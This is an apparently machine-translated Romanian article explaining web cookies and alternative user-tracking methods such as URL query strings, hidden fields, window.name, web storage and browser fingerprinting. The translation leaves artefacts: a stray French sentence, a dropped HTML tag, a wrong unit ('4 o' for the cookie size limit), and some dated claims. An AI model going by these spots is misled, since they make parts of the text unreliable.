Utilizarea cookie-urilor poate genera o contradicție între starea clientului și starea stocată în cookie. Dacă utilizatorul achiziționează un cookie și dă clic pe butonul „Înapoi” al browserului, starea browserului nu este în general aceeași ca înainte de această achiziție. De exemplu, dacă coșul unui magazin online este creat folosind cookie-uri, conținutul coșului nu se poate modifica atunci când utilizatorul revine la istoricul browserului: dacă utilizatorul apasă un buton pentru a adăuga un articol în coșul său și dă clic pe butonul „Return butonul ", articolul rămâne în acesta. Aceasta poate să nu fie intenția utilizatorului, care cu siguranță dorește să anuleze adăugarea articolului. Acest lucru poate duce la neîncredere, confuzie și erori. Deci, dezvoltatorii web ar trebui să fie conștienți de această problemă și să pună în aplicare măsuri pentru a gestiona situații ca aceasta.

Cookie-urile persistente au fost criticate de experții în securitatea confidențialității pentru că nu sunt setate să expire suficient de curând, permițând astfel site-urilor web să urmărească utilizatorii și să-și construiască profilul în timp. Acest aspect al cookie-urilor este, de asemenea, parte a problemei deturnării sesiunii, deoarece un cookie persistent furat poate fi folosit pentru a uzurpa identitatea unui utilizator pentru o perioadă considerabilă de timp.

Pentru a citi, de asemenea: GAFAM: cine sunt? De ce sunt (uneori) atât de înfricoșătoare?

Alternative la cookie-uri

Unele operațiuni care pot fi efectuate folosind cookie-uri pot fi efectuate și folosind alte mecanisme care ocolesc cookie-urile sau recreează cookie-urile șterse, ceea ce creează probleme de confidențialitate în același mod (sau uneori mai rău pentru că atunci sunt invizibile) decât cookie-urile.

Adresa IP

Utilizatorii pot fi urmăriți cu adresa IP a computerului care apelează pagina. Această tehnică este disponibilă încă de la introducerea World Wide Web, pe măsură ce paginile sunt descărcate, serverul solicită adresa IP a computerului care rulează browserul sau proxy-ul, dacă nu este folosit niciunul. Serverul poate urmări aceste informații indiferent dacă sunt sau nu cookie-uri în uz. Cu toate acestea, aceste adrese sunt de obicei mai puțin fiabile în identificarea unui utilizator decât cookie-urile, deoarece computerele și proxy-urile pot fi partajate de mai mulți utilizatori și același computer poate primi o adresă IP diferită la fiecare sesiune de lucru (cum ar fi adesea cazul conexiunilor telefonice) .

Urmărirea după adrese IP poate fi fiabilă în anumite situații, cum ar fi conexiunile în bandă largă care mențin aceeași adresă IP pentru o perioadă lungă de timp, atâta timp cât alimentarea este pornită.

Unele sisteme precum Tor sunt concepute pentru a menține anonimatul internetului și pentru a face imposibilă sau impracticabilă urmărirea după adresa IP.

URL-ul

O tehnică mai precisă se bazează pe încorporarea informațiilor în adrese URL. Partea șirului de interogare a adresei URL este o tehnică care este de obicei utilizată în acest scop, dar pot fi folosite și alte părți. Atât serverletul Java, cât și mecanismele de sesiune PHP folosesc această metodă dacă cookie-urile nu sunt activate.

Această metodă implică ca serverul web să atașeze solicitări de șir la legăturile paginii web care o poartă atunci când este trimisă către browser. Când utilizatorul urmează un link, browserul returnează șirul de interogare atașat serverului.

Sirurile de interogare folosite in acest scop si cookie-urile sunt foarte asemanatoare, ambele fiind informatii alese arbitrar de server si returnate de browser. Cu toate acestea, există unele diferențe: atunci când o adresă URL care conține un șir de interogare este reutilizată, aceleași informații sunt trimise către server. De exemplu, dacă preferințele unui utilizator sunt codificate într-un șir de interogare al unei adrese URL și utilizatorul trimite acea adresă URL către alt utilizator prin e-mail, acel utilizator va putea, de asemenea, să folosească acele preferințe.

Pe de altă parte, atunci când un utilizator accesează de două ori aceeași pagină, nu există nicio garanție că același șir de interogare va fi folosit de ambele ori. De exemplu, dacă un utilizator ajunge pe o pagină dintr-o pagină internă a site-ului prima dată și aterizează pe aceeași pagină dintr-o pagină externă a doua oară, șirul de interogare relativ la pagina site-ului este de obicei diferit, în timp ce cookie-urile sunt aceleași .

Alte dezavantaje ale șirurilor de interogare sunt legate de securitate: păstrarea datelor care identifică o sesiune în șiruri de interogare activează sau simplifică atacurile de fixare a sesiunii, atacurile de referință la identificatori și alte exploit-uri. Transmiterea ID-urilor de sesiune ca cookie-uri HTTP este mai sigură.

Câmp de formular ascuns

O formă de urmărire a sesiunii, utilizată de ASP.NET, este utilizarea formularelor web cu câmpuri ascunse. Această tehnică este foarte asemănătoare cu utilizarea șirurilor de interogare URL pentru a transporta informații și are aceleași avantaje și dezavantaje; iar dacă formularul este procesat cu metoda HTTP GET, câmpurile devin de fapt parte din URL-ul browserului care îl va trimite la trimiterea formularului. Dar majoritatea formularelor sunt procesate cu HTTP POST, ceea ce face ca informațiile din formular, inclusiv câmpurile ascunse, să fie adăugate ca o intrare suplimentară care nu face parte nici din URL, nici din cookie.

Această abordare are două avantaje din perspectiva urmăririi: în primul rând, urmărirea informațiilor plasate în codul sursă HTML și intrarea POST, mai degrabă decât în ​​URL, va permite utilizatorului obișnuit să evite această urmărire; în al doilea rând, informațiile despre sesiune nu sunt copiate atunci când utilizatorul copiază adresa URL (pentru a salva pagina pe disc sau pentru a o trimite prin e-mail, de exemplu).

fereastra.nume

Toate browserele web obișnuite pot stoca o cantitate destul de mare de date (2MB până la 32MB) prin JavaScript folosind proprietatea window.name a DOM. Aceste date pot fi folosite în locul cookie-urilor de sesiune și sunt, de asemenea, folosite pe domenii. Tehnica poate fi cuplată cu obiecte JSON pentru a stoca un set complex de variabile de sesiune la nivelul clientului.

Dezavantajul este că fiecare fereastră sau filă separată va avea inițial o fereastră.nume goală; la navigarea pe file (deschise de utilizator) aceasta înseamnă că filele deschise individual nu vor avea un nume de fereastră. În plus, window.name poate fi folosit pentru a urmări vizitatorii pe diferite site-uri, ceea ce poate reprezenta o problemă de confidențialitate.

În unele privințe, acest lucru poate fi mai sigur decât cookie-urile, din cauza neimplicarii serverului, făcându-l astfel invulnerabil la atacul de rețea al cookie-urilor sniffer. Cu toate acestea, dacă se iau măsuri speciale pentru protejarea datelor, acestea sunt vulnerabile la alte atacuri, deoarece datele sunt disponibile prin alte site-uri deschise în aceeași fereastră.

Autentificare HTTP

Protocolul HTTP include protocoalele de bază de autentificare a accesului și rezumatul de autentificare a accesului, care permite accesul la o pagină web numai atunci când utilizatorul a dat numele de utilizator și parola. Dacă serverul solicită un certificat pentru a acorda acces la o pagină web, browserul îl solicită utilizatorului și odată obținut, browserul îl stochează și îl trimite în toate solicitările HTTP ulterioare. Aceste informații pot fi folosite pentru a urmări utilizatorul.

Obiect local partajat

Dacă un browser include pluginul Adobe Flash Player, obiecte locale partajate pot fi folosite în același scop ca cookie-urile. Ele pot fi o alegere atractivă pentru dezvoltatorii web deoarece:

  • limita implicită de dimensiune pentru un obiect partajat local este de 100 KB;
  • verificările de securitate sunt separate de verificările cookie-urilor utilizator (deci obiectele locale partajate pot fi permise atunci când cookie-urile nu sunt).

Acest ultim punct, care distinge politica de gestionare a cookie-urilor de cea a obiectelor partajate locale ale Adobe ridică întrebări privind gestionarea de către utilizator a setărilor sale de confidențialitate: acesta trebuie să fie conștient de faptul că gestionarea cookie-urilor nu are impact asupra gestionării obiectelor locale partajate și invers.

O altă critică la adresa acestui sistem este că poate fi utilizat numai prin pluginul Adobe Flash Player care este proprietar și nu un standard web.

Persistență din partea clientului

Unele browsere web acceptă un mecanism de persistență bazat pe script, care permite paginii să stocheze informații local pentru o utilizare ulterioară. Internet Explorer, de exemplu, acceptă informații persistente în istoricul browserului, în marcaje, într-un format stocat în XML sau direct cu o pagină web salvată pe disc. Pentru Microsoft Internet Explorer 5, există o metodă de date utilizator disponibilă prin comportamentele DHTML.

W3C a introdus în HTML 5 un nou API JavaScript pentru stocarea datelor la nivelul clientului numit stocare web și a avut ca scop înlocuirea permanentă a cookie-urilor. Este similar cu cookie-urile, dar cu o capacitate mult îmbunătățită și fără a stoca informații în antetul solicitărilor HTTP. API-ul permite două tipuri de stocare web: stocare locală și stocare sesiune, similare cookie-urilor persistente și cookie-urilor de sesiune (cu excepția faptului că cookie-urile de sesiune expiră când browserul este închis în timp ce stocarea sesiunilor expiră atunci când fila este închisă), respectiv. Stocarea web este acceptată de Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 și Opera 10.50.

Un mecanism diferit se bazează în mod normal pe memorarea în cache a browserului (în memorie, mai degrabă decât pe reîmprospătare) folosind programe JavaScript în paginile web. 

De exemplu, o pagină poate conține eticheta . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

În acest moment, programul rămâne în memoria cache și pagina vizitată nu este reîncărcată a doua oară. În consecință, dacă programul conține o variabilă globală (de exemplu var id = 3243242;), acest identificator rămâne valabil și poate fi exploatat de alt cod JavaScript odată ce pagina este încărcată din nou, sau odată ce o pagină care leagă programul este încărcată. 

Dezavantajul major al acestei metode este că variabila globală JavaScript trebuie să fie statică, ceea ce înseamnă că nu poate fi modificată sau ștearsă ca un cookie.

amprenta browserului web

O amprentă a browserului este informații colectate despre setările de configurare ale unui browser în scopuri de identificare. Aceste amprente pot fi folosite pentru a identifica complet sau parțial un utilizator de internet sau un dispozitiv, chiar și atunci când cookie-urile sunt dezactivate.

Informațiile de bază de configurare a browserului web au fost colectate de mult timp de serviciile de audiență a site-ului web în scopul de a măsura cu exactitate traficul uman web și de a detecta diferite forme de fraudă prin clicuri. Cu ajutorul limbajelor de scriptare la nivelul clientului, colectarea informațiilor este mult mai precisă acum posibil.

Convertirea acestor informații într-un șir de biți produce o amprentă a dispozitivului. În 2010, Electronic Frontier Foundation (EFF) a măsurat entropia amprentei unui browser să fie cel puțin 18,1 biți, și asta înainte ca progresele în amprentarea pânzei să adauge 5,7 biți la acea entropie.

Biscuiti pe scurt

Cookie-urile sunt fișiere text mici stocate de browserul web pe hard disk-ul unui vizitator al site-ului web și care sunt folosite (printre altele) pentru a înregistra informații despre vizitator sau călătoria acestuia prin site. Webmasterul poate recunoaște astfel obiceiurile unui vizitator și personaliza prezentarea site-ului său pentru fiecare vizitator; cookie-urile fac apoi posibilă reținerea câte articole trebuie afișate pe pagina de start sau chiar păstrarea acreditărilor de conectare pentru orice parte privată: atunci când vizitatorul revine pe site, nu mai este necesar ca acesta să-și introducă numele și parola pentru să fie recunoscute, deoarece sunt citite automat în cookie.

Un cookie are o durată de viață limitată, stabilită de designerul site-ului. Ele pot expira și la finalul sesiunii de pe site, ceea ce corespunde închiderii browserului. Cookie-urile sunt utilizate pe scară largă pentru a ușura viața vizitatorilor și pentru a le prezenta informații mai relevante. Dar tehnicile speciale fac posibilă urmărirea unui vizitator pe mai multe site-uri și, astfel, colectarea și verificarea încrucișată a informațiilor foarte extinse despre obiceiurile sale. Această metodă a conferit utilizării cookie-urilor o reputație de tehnică de supraveghere care încalcă confidențialitatea vizitatorilor, ceea ce, din păcate, corespunde realității în multe cazuri de utilizare din motive non-tehnice sau nerespectatoare de așteptările utilizatorilor. .

Ca răspuns la aceste temeri legitime, HTML 5 introduce un nou API JavaScript pentru stocarea datelor la nivelul clientului numit stocare Web, care este mult mai sigur și cu capacitate mai mare, care are ca scop înlocuirea cookie-urilor.

Stocarea cookie-urilor

Cu unele browsere, un cookie este ușor de editat, un simplu editor de text precum Notepad este suficient pentru a-și schimba manual valorile.

Cookie-urile sunt salvate diferit în funcție de browser:

  • Microsoft Internet Explorer salvează fiecare cookie într-un fișier diferit;
  • Mozilla Firefox salvează toate modulele cookie într-un singur fișier;
  • Operă își salvează toate cookie-urile într-un singur fișier și le criptează (imposibil să le modifici decât în ​​opțiunile software);
  • Apple Safari salvează toate modulele cookie într-un singur fișier cu extensie .plist. Modificarea este posibilă, dar nu foarte ușoară, cu excepția cazului în care parcurgeți opțiunile software.

Browserele sunt necesare pentru a sprijini cel puțin :

  • 300 de cookie-uri simultane;
  • 4 o per cookie;
  • 20 cookie-uri per gazdă sau domeniu.
[Total: 0 Rău: 0]

Compus de Editorii de recenzii

Echipa de editori experți își petrece timpul cercetând produse, efectuând teste practice, intervievând profesioniștii din industrie, examinând recenziile consumatorilor și scriind toate rezultatele noastre ca rezumate inteligibile și cuprinzătoare.

Lasă un comentariu

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate *

Ce părere ai?

384 Puncte
upvote Downvote